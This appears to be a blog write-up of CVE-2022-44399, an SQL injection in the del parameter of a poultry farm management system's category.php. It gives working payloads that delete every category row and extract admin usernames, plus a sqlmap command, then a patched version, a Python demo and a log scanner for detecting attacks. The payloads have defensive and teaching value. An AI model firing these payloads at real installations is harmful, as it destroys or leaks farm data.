If you’re running Poultry Farm Management System (PFMS) v1.0, the PHP/MySQL project that ships under the Redcock-Farm directory name, you need to pay attention to a serious SQL injection bug tracked as CVE-2022-44399. This vulnerability lets attackers run their own SQL against your database, which can destroy or leak your farm’s data or, depending on the database privileges the application runs with, hand attackers control of the backend. In this long read, I’ll explain in simple terms how it works, how you can try it (for testing and research, against a copy you own!), and how to protect yourself.

What is CVE-2022-44399?

CVE-2022-44399 refers to a SQL injection vulnerability in Poultry Farm Management System v1.0, specifically in the category.php script at /Redcock-Farm/farm/category.php. The script takes the del parameter from the request and concatenates it straight into a database query with no validation, escaping, or parameter binding.

Anyone who can send a request to that script can put SQL of their own into the parameter, and the database will execute it as part of the application’s query. The consequences are serious: at minimum an attacker can delete data, and with a little more work they can read it.

Where’s the Flaw?

Let’s take a look at the typical request the web app makes when someone wants to delete a poultry category:

GET /Redcock-Farm/farm/category.php?del=5

Here, 5 is meant to be a category ID. But what if, instead of a plain number, an attacker sends SQL of their own?

In category.php, you might see code like this:

<?php
include('db.php');   // opens the mysqli connection in $conn
if(isset($_GET['del'])) {
    $id = $_GET['del'];
    // Injection point: $id is interpolated straight into the query text.
    $result = mysqli_query($conn, "DELETE FROM category WHERE id='$id'");
    if ($result) {
        echo "Category deleted.";
    }
}
?>

Here’s the flaw: $id goes into the SQL string with no validation, escaping, or prepared statement, so whatever an attacker puts in the del parameter becomes part of the query the database runs.

Demo: Exploiting the SQL Injection

Let’s start with the simplest, most destructive case: an attacker who just wants to wipe the category table. They could craft a URL like:

/Redcock-Farm/farm/category.php?del=5' OR 1=1 -- -

This changes the SQL statement from

DELETE FROM category WHERE id='5';

to

DELETE FROM category WHERE id='5' OR 1=1 -- -'

This deletes every row in the category table: 1=1 is always true, so the WHERE clause matches everything, and the trailing -- - turns the application’s closing quote into a comment so the statement still parses.

Reading Data Instead of Deleting

The above example deletes rows, but a smart attacker can use error-based or blind SQL injection techniques to *read* sensitive information, even though a DELETE statement never returns rows to the page.

Suppose the attacker wants to force a SQL error that leaks data (the admin table and username column here are assumed for illustration):

/Redcock-Farm/farm/category.php?del=5' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT username FROM admin LIMIT 0,1),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -

This is the classic MySQL duplicate-entry trick: GROUP BY on a value that mixes the target string with FLOOR(RAND(0)*2) makes MySQL raise a “Duplicate entry ... for key 'group_key'” error, and the duplicated value contains the admin username (0x7e is the ~ separator). If the application prints database errors, the username appears in the response; if it doesn’t, the attacker falls back to boolean- or time-based blind injection, which only needs the page to behave differently, or respond slower, when a condition is true.

Here’s how to automate it with sqlmap:

sqlmap -u "http://target/Redcock-Farm/farm/category.php?del=1" --batch --dbs

sqlmap will probe the parameter and enumerate the available databases. One caveat before you run it: because the parameter feeds a DELETE statement, every probe is itself a delete. del=1 removes category 1 on the very first request, and any tautology-style payload sqlmap tries will empty the table. Only run this against a throwaway copy of the application and its database, never against a production install.

Original References

- Exploit Database - CVE-2022-44399
- NVD CVE Detail
- Packet Storm Security Notice

Secure Code Example

$id = filter_var($_GET['del'] ?? '', FILTER_VALIDATE_INT);   // reject anything that is not an integer
if ($id === false) { http_response_code(400); exit('Invalid category id.'); }
$stmt = $conn->prepare("DELETE FROM category WHERE id=?");  // query text is fixed, no user data in it
$stmt->bind_param('i', $id);                                 // the id travels separately, as an integer
$stmt->execute();
$stmt->close();

Here $conn is the mysqli connection from db.php. The prepared statement keeps SQL code and user data separate, so the value can never be parsed as SQL; the integer check in front of it rejects junk before it reaches the database at all and gives the client a clean 400 instead of a silent no-op.
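To see the contrast between the vulnerable query from the Demo section and the prepared statement above in something you can run on your own machine, here is an added example that is not code from the original post or from the PFMS project: it reproduces the concatenate-versus-bind difference in Python against an in-memory SQLite table. The table name category and its rows are constructed for the demo, and SQLite’s comment syntax and integer/text comparison rules are close enough to MySQL’s that the 5' OR 1=1 -- - payload behaves the same way.

```python
import sqlite3

# Constructed sample data for the demo; not the real PFMS schema or rows.
SEED_ROWS = [(1, "Layers"), (2, "Broilers"), (5, "Ducks")]


def make_db():
    """Fresh in-memory database with a minimal category table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO category VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def remaining_ids(conn):
    """Category ids still present, in ascending order."""
    return [row[0] for row in conn.execute("SELECT id FROM category ORDER BY id")]


def delete_vulnerable(conn, del_param):
    """Mirror of the unsafe PHP: del is pasted straight into the query text."""
    sql = f"DELETE FROM category WHERE id='{del_param}'"
    conn.execute(sql)
    conn.commit()
    return remaining_ids(conn)


def delete_bound(conn, del_param):
    """Binding alone: the raw string is passed as a parameter, never parsed as SQL.

    An injection string simply matches no row, so nothing is deleted.
    """
    conn.execute("DELETE FROM category WHERE id=?", (del_param,))
    conn.commit()
    return remaining_ids(conn)


def delete_safe(conn, del_param):
    """Validate first, then bind: the equivalent of the hardened PHP above.

    Raises ValueError for anything that is not an integer, so bad input
    is rejected before it reaches the database at all.
    """
    category_id = int(del_param)  # "5' OR 1=1 -- -" fails here
    conn.execute("DELETE FROM category WHERE id=?", (category_id,))
    conn.commit()
    return remaining_ids(conn)


if __name__ == "__main__":
    payload = "5' OR 1=1 -- -"
    print("vulnerable, del=5       ->", delete_vulnerable(make_db(), "5"))
    print("vulnerable, del=payload ->", delete_vulnerable(make_db(), payload))
    print("bound,      del=payload ->", delete_bound(make_db(), payload))
    print("safe,       del=5       ->", delete_safe(make_db(), "5"))
    try:
        delete_safe(make_db(), payload)
    except ValueError as exc:
        print("safe,       del=payload -> rejected:", exc)
```

Running it shows the vulnerable version deleting only row 5 for del=5 but every row for the payload, the bound version leaving all three rows intact because the payload is just a string that matches no id, and the validated version refusing the payload outright.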

Final Thoughts

CVE-2022-44399 is a classic but critical SQL injection bug: one unvalidated GET parameter gives anyone who can reach category.php the ability to delete, and with a little more effort read, whatever the application’s database account can touch. Update to a fixed release if the vendor provides one; otherwise patch category.php yourself as in the secure code example above, and review the rest of the code base for the same pattern of interpolating request parameters into queries. If you suspect you’ve been hit, check your web server logs for requests to category.php whose del value is anything other than a plain integer, and restore the category table from a known-good backup.
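If you want to check whether anyone has already been poking at the del parameter, here is an added example that is not part of the original post or of the PFMS project: it scans Apache-style combined access-log lines for requests to category.php whose del value is anything other than a plain integer, and reports the decoded value alongside the client IP, status code and user agent. The log lines embedded in it are constructed for the demo; the IP addresses, timestamps and user agents are made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines for the demo; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Nov/2022:10:01:02 +0000] "GET /Redcock-Farm/farm/category.php?del=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Nov/2022:10:02:11 +0000] "GET /Redcock-Farm/farm/category.php?del=5%27%20OR%201%3D1%20--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [28/Nov/2022:10:03:45 +0000] "GET /Redcock-Farm/farm/category.php?del=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.6.11#stable"
203.0.113.7 - - [28/Nov/2022:10:04:00 +0000] "GET /Redcock-Farm/farm/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def del_values(target):
    """Decoded 'del' values from a request target, or [] if it is not category.php."""
    parts = urlsplit(target)
    if not parts.path.endswith("/category.php"):
        return []
    # parse_qs percent-decodes, so %27 comes back as a literal quote.
    return parse_qs(parts.query, keep_blank_values=True).get("del", [])


def find_suspicious(log_text):
    """Every category.php request whose del value is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for value in del_values(rec["target"]):
            if re.fullmatch(r"\d+", value):
                continue  # a bare integer is what the application expects
            hits.append({
                "ip": rec["ip"], "ts": rec["ts"], "del": value,
                "status": rec["status"], "ua": rec["ua"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} '
              f'ua={hit["ua"]!r} del={hit["del"]!r}')
```

Point it at your real access log by reading the file into find_suspicious instead of SAMPLE_LOG. Flagging on “not a plain integer” rather than on a keyword list catches encoded, blind and time-based payloads alike, and a 200 next to a destructive del value is the signal to compare the category table against your last backup.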

Timeline

Published on: 11/28/2022 16:15:00 UTC
Last modified on: 12/01/2022 22:53:00 UTC